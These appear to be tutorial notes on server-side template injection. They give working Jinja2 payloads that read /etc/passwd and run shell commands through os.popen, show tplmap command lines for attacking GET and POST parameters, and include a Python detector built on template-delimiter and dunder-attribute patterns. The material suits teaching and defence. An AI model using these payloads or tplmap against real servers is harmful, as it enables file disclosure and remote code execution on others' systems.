This is when a user can pass in a parameter that controls the template engine running on the server.

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/3971fa32-0190-4876-a303-e834c805ccc3/Untitled.png

For example, in the code above, whatever we enter in the name field is rendered on the web page.

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/e88e110c-5954-4276-b110-73cf56b53d26/Untitled.png

We can use certain payloads from this repository: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#basic-injection

{{ ''.__class__.__mro__[2].__subclasses__()[40](<file>).read() }}
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }} # To read the passwd file
{{ config.__class__.__init__.__globals__['os'].popen('id').read() }}

We don't have to remember these payloads; we can use an automated tool instead:

tplmap: https://github.com/epinna/tplmap

This tool can be downloaded from the git repo, and you can use pip2 to install its requirements.

How to use it:

./tplmap.py -u <URL>/?<vulnparam>  # For GET requests
./tplmap.py -u <URL> -d '<vulnparam>'  # For POST requests
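
From the defender's side, the payloads listed above share two markers that can be looked for in request parameters: template expression delimiters and the double-underscore attributes used to walk Python objects. The following is an added example, not part of the original notes; the function names, the severity labels and the sample requests are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Markers from the payloads in these notes: expression delimiters and dunder attributes.
DELIMS = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)
DUNDERS = re.compile(r"__(class|mro|subclasses|globals|init|builtins)__")

def decode_fully(value, rounds=3):
    """Undo nested URL encoding (e.g. %257B -> %7B -> {), bounded by `rounds`."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def score_value(value):
    """Return (severity, decoded) for one parameter value, or None if clean."""
    decoded = decode_fully(value)
    has_delim = bool(DELIMS.search(decoded))
    has_dunder = bool(DUNDERS.search(decoded))
    if has_delim and has_dunder:
        return ("high", decoded)      # expression that walks object internals
    if has_delim or has_dunder:
        return ("medium", decoded)    # template syntax or a partial payload
    return None

def scan_request(method, url, body=""):
    """Check every query-string and form-body parameter of one request."""
    params = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    if method.upper() == "POST":
        params += parse_qsl(body, keep_blank_values=True)
    findings = []
    for name, value in params:
        hit = score_value(value)
        if hit:
            findings.append((name, hit[0], hit[1]))
    return findings

# Constructed sample requests (method, URL, body); not real traffic.
SAMPLES = [
    ("GET", "/hello?name=Alice", ""),
    ("GET", "/hello?name=%7B%7B+name+%7D%7D", ""),
    ("POST", "/hello", "name=%257B%257B+''.__class__.__mro__+%257D%257D"),
]

if __name__ == "__main__":
    for method, url, body in SAMPLES:
        print(method, url, scan_request(method, url, body))
```

A check like this only surfaces requests for review; the fix is on the server, where user input is passed to the template as data instead of becoming part of the template source.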